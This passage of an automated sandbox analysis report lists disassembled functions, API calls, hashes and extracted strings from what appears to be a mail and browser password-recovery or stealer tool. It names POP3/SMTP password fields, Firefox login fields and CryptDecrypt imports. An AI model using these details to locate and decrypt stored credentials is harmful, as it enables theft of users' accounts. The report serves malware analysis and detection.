                                                                                                                                                                                    • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                    • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                                                                                                    Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                      • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_strcmpimemset
                                                                                                                                                                                    • String ID: /stext
                                                                                                                                                                                    • API String ID: 520177685-3817206916
                                                                                                                                                                                    • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                    • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                                                    • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                                                    Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 145871493-0
                                                                                                                                                                                    • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                                                    • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                                                                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                                                    Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4165544737-0
                                                                                                                                                                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                                                    Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                                                    Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                                                    Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                                                                                    Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnumNamesResource
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3334572018-0
                                                                                                                                                                                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                                                                                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                                                                                    Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                                                                                    Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                                                                                    Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                    • API String ID: 2238633743-192783356
                                                                                                                                                                                    • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                    • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                    Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                                                    • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                    • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                    • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                    Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID: (yE$(yE$(yE
                                                                                                                                                                                    • API String ID: 1865533344-362086290
                                                                                                                                                                                    • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                    • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                    Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                    • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                    • API String ID: 3137614212-1455797042
                                                                                                                                                                                    • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                    • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                    • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                    Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                      • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                      • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                      • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                                      • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                      • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                      • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                    • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                    • API String ID: 4171719235-3943159138
                                                                                                                                                                                    • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                    • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                    Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
